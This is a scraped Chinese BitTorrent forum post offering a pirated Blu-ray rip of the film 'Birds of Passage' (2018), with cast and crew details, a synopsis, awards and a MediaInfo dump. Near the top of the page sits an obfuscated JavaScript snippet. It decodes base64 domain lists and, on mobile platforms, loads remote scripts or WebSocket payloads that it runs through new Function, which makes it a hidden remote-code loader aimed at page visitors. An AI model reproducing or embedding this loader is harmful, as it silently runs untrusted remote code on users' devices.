候鸟[双语字幕]Birds.of.Passage.2018.FRA.1080p.BluRay.x264.DTS-迅雷下载@BT9527.COM 16.49GB

版主小s 2月前 255

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 候鸟 / Birds Of Passage / Juanita / 毒枭大时代(港) / 毒枭幻影(台)
◎片  名 Pájaros de verano
◎年  代 2018
◎产  地 哥伦比亚 / 丹麦 / 墨西哥 / 德国 / 瑞士
◎类  别 剧情 / 惊悚
◎语  言 西班牙语 / 英语 / 瓦尤语
◎上映日期 2018-05-09(戛纳电影节) / 2018-08-02(哥伦比亚)
◎IMDb评分  7.5/10 from 10263 users
◎IMDb链接  https://www.imdb.com/title/tt6386748
◎豆瓣评分 6.6/10 from 2173 users
◎豆瓣链接 https://movie.douban.com/subject/26682914/
◎片  长 125分钟
◎导  演 克丽丝蒂娜·加耶果 Cristina Gallego / 西罗·格拉 Ciro Guerra
◎编  剧 玛丽亚?卡米拉?阿里亚斯 Maria Camila Arias / 雅克·图莱蒙德·维达尔 Jacques Toulemonde Vidal
◎主  演 卡米娜·马蒂内 Carmi?a Martínez
       何塞·阿科斯塔 José Acosta
       娜塔利娅·雷耶斯 Natalia Reyes
       约恩·纳瓦埃斯 Jhon Narváez
       格雷德·梅扎 Greider Meza
       何塞·维森特 José Vicente
       胡安·包蒂斯塔·马丁内斯 Juan Bautista Martínez
       米格尔·维埃拉 Miguel Viera
       塞尔希奥·科恩 Sergio Coen
       阿斯列尼斯·马尔克斯 Aslenis Márquez
       何塞·奈德 José Naider
       扬克·迪亚兹 Yanker Díaz
       维克多·蒙特罗 Víctor Montero
       华金·拉蒙 Joaquín Ramón
       豪尔赫·拉斯卡罗 Jorge Lascarro


◎标  签 哥伦比亚 | 犯罪 | 剧情 | 2018 | 拉美 | 哥伦比亚电影 | 西罗·格拉 | 戛纳

◎简  介  

  70年代的哥伦比亚,青年拉帕耶爱上氏族中美艳动人的少女赛妲,但女方家长却要求价值惊人的嫁妆试图刁难。顽强的拉帕耶不愿放弃心爱的人,决定铤而走险,干起大麻生意。贩毒事业一帆风顺,鲜血腥味却伴随庞大财富而来,拉帕耶一步步扎根建立威信,然而亲友背叛、传统覆灭,他的世界也逐步瓦解??。十年酝酿构思,章节分段叙事,《梦游亚马逊》导演、监制共同打造魔幻犯罪史诗,以作者风格融入类型片框架。回顾哥伦比亚毒枭的黄金年代,物质生活进驻荒野,在性、暴力、权力之间,透过帮派悲剧片型描绘境内游牧民族瓦尤人传统精神凋零过程。在枪火烟硝底下,埋藏不复得见的灵魂挽歌。

◎获奖情况  

  第71届戛纳电影节(2018)
  导演双周单元(提名) 克丽丝蒂娜·加耶果 / 西罗·格拉

  第71届洛迦诺国际电影节(2018)
  Variety Piazza Grande Award(提名) 克丽丝蒂娜·加耶果 / 西罗·格拉

  1. General
  2. Unique ID                                : 10101788188106898966707274854928409538 (0x799889C640734493B1E367A512AE3C2)
  3. Complete name                            : [email protected]
  4. Format                                   : Matroska
  5. Format version                           : Version 4
  6. File size                                : 16.5 GiB
  7. Duration                                 : 2 h 5 min
  8. Overall bit rate                         : 18.9 Mb/s
  9. Encoded date                             : UTC 2021-07-08 06:52:37
  10. Writing application                      : mkvmerge v55.0.0 ('Waiting For Space') 64-bit
  11. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4
  12. Video
  13. ID                                       : 1
  14. Format                                   : AVC
  15. Format/Info                              : Advanced Video Codec
  16. Format profile                           : [email protected]
  17. Format settings                          : CABAC / 4 Ref Frames
  18. Format settings, CABAC                   : Yes
  19. Format settings, Reference frames        : 4 frames
  20. Codec ID                                 : V_MPEG4/ISO/AVC
  21. Duration                                 : 2 h 5 min
  22. Bit rate                                 : 17.3 Mb/s
  23. Width                                    : 1 920 pixels
  24. Height                                   : 800 pixels
  25. Display aspect ratio                     : 2.40:1
  26. Frame rate mode                          : Constant
  27. Frame rate                               : 23.976 (24000/1001/53354) FPS
  28. Color space                              : YUV
  29. Chroma subsampling                       : 4:2:0
  30. Bit depth                                : 8 bits
  31. Scan type                                : Progressive
  32. Bits/(Pixel*Frame)                       : 0.470
  33. Stream size                              : 15.1 GiB (92%)
  34. Writing library                          : x264 core 161 r3048+53M 0749c36 t_mod_New [(8 & 10)[email protected] X86_64]
  35. Encoding settings                        : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=25 / lookahead_threads=6 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=18.0000 / qcomp=0.60 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.70 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0
  36. Language                                 : English
  37. Default                                  : Yes
  38. Forced                                   : No
  39. Audio
  40. ID                                       : 2
  41. ID in the original source medium         : 4353 (0x1101)
  42. Format                                   : DTS
  43. Format/Info                              : Digital Theater Systems
  44. Codec ID                                 : A_DTS
  45. Duration                                 : 2 h 5 min
  46. Bit rate mode                            : Constant
  47. Bit rate                                 : 1 509 kb/s
  48. Channel(s)                               : 6 channels
  49. Channel layout                           : C L R Ls Rs LFE
  50. Sampling rate                            : 48.0 kHz
  51. Frame rate                               : 93.750 FPS (512 SPF)
  52. Bit depth                                : 24 bits
  53. Compression mode                         : Lossy
  54. Stream size                              : 1.32 GiB (8%)
  55. Language                                 : Spanish
  56. Default                                  : Yes
  57. Forced                                   : No
  58. Original source medium                   : Blu-ray
  59. Text #1
  60. ID                                       : 3
  61. ID in the original source medium         : 4609 (0x1201)
  62. Format                                   : PGS
  63. Muxing mode                              : zlib
  64. Codec ID                                 : S_HDMV/PGS
  65. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  66. Duration                                 : 1 h 57 min
  67. Bit rate                                 : 26.4 kb/s
  68. Count of elements                        : 1934
  69. Stream size                              : 22.2 MiB (0%)
  70. Title                                    : chs&eng
  71. Language                                 : Chinese
  72. Default                                  : Yes
  73. Forced                                   : No
  74. Original source medium                   : Blu-ray
  75. Text #2
  76. ID                                       : 4
  77. ID in the original source medium         : 4610 (0x1202)
  78. Format                                   : PGS
  79. Muxing mode                              : zlib
  80. Codec ID                                 : S_HDMV/PGS
  81. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  82. Duration                                 : 1 h 57 min
  83. Bit rate                                 : 26.5 kb/s
  84. Count of elements                        : 1934
  85. Stream size                              : 22.3 MiB (0%)
  86. Title                                    : cht&eng
  87. Language                                 : Chinese
  88. Default                                  : No
  89. Forced                                   : No
  90. Original source medium                   : Blu-ray
  91. Text #3
  92. ID                                       : 5
  93. ID in the original source medium         : 4611 (0x1203)
  94. Format                                   : PGS
  95. Muxing mode                              : zlib
  96. Codec ID                                 : S_HDMV/PGS
  97. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  98. Duration                                 : 1 h 57 min
  99. Bit rate                                 : 17.0 kb/s
  100. Count of elements                        : 1934
  101. Stream size                              : 14.3 MiB (0%)
  102. Title                                    : chs
  103. Language                                 : Chinese
  104. Default                                  : No
  105. Forced                                   : No
  106. Original source medium                   : Blu-ray
  107. Text #4
  108. ID                                       : 6
  109. ID in the original source medium         : 4612 (0x1204)
  110. Format                                   : PGS
  111. Muxing mode                              : zlib
  112. Codec ID                                 : S_HDMV/PGS
  113. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  114. Duration                                 : 1 h 57 min
  115. Bit rate                                 : 17.2 kb/s
  116. Count of elements                        : 1934
  117. Stream size                              : 14.4 MiB (0%)
  118. Title                                    : cht
  119. Language                                 : Chinese
  120. Default                                  : No
  121. Forced                                   : No
  122. Original source medium                   : Blu-ray
  123. Text #5
  124. ID                                       : 7
  125. ID in the original source medium         : 4613 (0x1205)
  126. Format                                   : PGS
  127. Muxing mode                              : zlib
  128. Codec ID                                 : S_HDMV/PGS
  129. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  130. Duration                                 : 1 h 57 min
  131. Bit rate                                 : 9 464 b/s
  132. Count of elements                        : 1525
  133. Stream size                              : 7.95 MiB (0%)
  134. Language                                 : English
  135. Default                                  : No
  136. Forced                                   : No
  137. Original source medium                   : Blu-ray
  138. Menu
  139. 00:00:00.000                             : en:第 01 章
  140. 00:10:29.629                             : en:第 02 章
  141. 00:21:25.117                             : en:第 03 章
  142. 00:32:46.255                             : en:第 04 章
  143. 00:44:55.109                             : en:第 05 章
  144. 00:52:48.081                             : en:第 06 章
  145. 01:01:20.009                             : en:第 07 章
  146. 01:13:39.873                             : en:第 08 章
  147. 01:28:13.121                             : en:第 09 章
  148. 01:41:03.682                             : en:第 10 章
  149. 01:50:42.469                             : en:第 11 章
  150. 01:57:50.063                             : en:第 12 章



此处一般会放置磁力链或电驴下载链接,不过此链接需要注册会员才能看到,点击“立即注册”
磁力链下载【磁力链接仅对注册会员开放,登陆后可见】

TAGS 剧情 惊悚

上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回